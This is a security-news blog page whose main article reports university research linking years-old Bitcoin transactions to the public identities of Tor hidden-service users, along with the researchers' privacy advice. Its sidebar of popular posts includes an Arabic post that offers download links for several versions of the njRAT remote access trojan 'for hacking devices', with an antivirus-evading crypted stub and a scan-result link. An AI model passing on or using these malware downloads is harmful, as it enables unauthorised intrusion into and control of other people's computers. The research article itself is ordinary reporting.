Old Bitcoin transactions can come back to haunt you



A group of researchers from Qatar University and Hamad Bin Khalifa University have demonstrated how years-old Bitcoin transactions can be used to retroactively deanonymize users of Tor hidden services.
Bitcoin transactions privacy
It seems that Bitcoin users’ past transactions – and especially if they used the cryptocurrency for illegal deals on the dark web and didn’t think to launder their payments – may come back to haunt them.

Researchers’ findings

“We crawled 1.5K hidden service pages and created a dataset of 88 Bitcoin addresses operated by those hidden services, including two ransomware addresses. We also crawled online social networks for public Bitcoin addresses, namely, Twitter and the BitcoinTalk forum. Out of 5B tweets and 1M forum pages, we created two datasets of 4.1K and 41K Bitcoin addresses, respectively. Each address in these user datasets is associated with an online identity and its corresponding public profile information,” the researchers explained.
“By analyzing the transactions in the Blockchain, we were able to link 125 unique users to 20 Tor hidden services, including sensitive ones, such as The Pirate Bay and Silk Road.”

?What now

Whether law enforcement and intelligence agencies will bother to replicate and widen the research remains to be seen, but there is no doubt that the permanence of the Bitcoin blockchain can be exploited for similar endeavours.
The researchers noted that the online identities to which they tied the transactions might and might not point directly to individuals, as it’s possible that these are fake online identities. Still, well resourced adversaries can perform online surveillance to track down the users and uncover their true identities.
They also pointed out that this approach can be used to deanonymize only a small number of users.
But for those users who can be linked, the researchers advised that the best course of action is to clean their social network footprint, focusing on removing PII that is publicly shared or deleting their linked online identities altogether – and hope that the information hasn’t been cached or preserved by digital archive services like the Internet Archive.
And, in the future, for similar transactions, it might be best to switch to using alternative coins that provide additional anonymity for transactions on the blockchain (e.g., Monero, Zcash).

Comments

Post a Comment

Popular posts from this blog

تحميل اصدارات برنامج njRAT لاختراق الاجهزة 2017

Image
تحميل   اصدارات برنامج  njRAT  لاختراق الاجهزة  2017 ---------------------------------------------------------------------------------------------- السلام عليكم ورحمة الله تعالى وبركاته تحميل جميع اصدارات برنامج  njRAT  الشهير لاختراق الاجهزة مع تشفيرة متواضعة  لستب njRAT 5 نتيجة فحص تشفيرة الستب http://pscan.xyz/results.php?id=VbGXRoAJjWiEeSHH الان ناتي الى التحميل njRAT_v0.3.5 للتحميل https://up.top4top.net/downloadf-483nr2oz4-rar.html njRAT_v0.4.1 https://up.top4top.net/downloadf-483nhv6j2-rar.html njRAT_v0.5.0 للتحميل https://up.top4top.net/downloadf-483nihol1-rar.html njRAT-v0.6.4 للتحميل https://up.top4top.net/downloadf-483dr2zk1-rar.html njRAT-v0.7d
Read more

Cybersecurity in 2018: Three predictions and one hope

Image
Effective cybersecurity means keeping a close eye on the threats you currently face, and an even closer eye on the threats to come. As you consider your security strategy and investments for the coming year, here are three key trends that will define the threat landscape in 2018, and one hope for a more effective approach to protection.  Risk will continue to shift from infrastructure to the application layer As web apps have evolved from basic information and ecommerce functionality to full-fledged online services, their code and customer data have made them an increasingly appealing target for hackers. Not only are they accessible via the open Internet—they’re also woefully underprotected, with the application layer drawing only 3 percent of the typical security budget at a time when it accounts for 30 percent of successful breaches, according to Verizon. While an incident of the magnitude of the Equifax breach can hardly be said to have a silver lining, at
Read more

Which phishing messages have a near 100% click rate?

Image
Training employees to spot phishing emails, messages and phone calls can’t be done just once or once a year if the organization wants to see click rates decrease. For one thing, employees come and go (and change roles) with regularity. Secondly, threats change over time. Thirdly, knowledge and practices that aren’t regularly reinforced will be lost. And, finally, awareness isn’t the same as knowledge. “Just knowing a threat exists isn’t the same as knowing how to recognize and respond to a threat when it presents itself. In-depth education about phishing prevention is needed to create lasting behavior change,” Wombat Security researchers point out. The statistics included in the company’s latest annual State of the Phish report show the difference made by both the tools used to train end users to recognize and avoid phishing attacks and how often they are used. In the US, most organizations use computer-based online security awareness training and simulated
Read more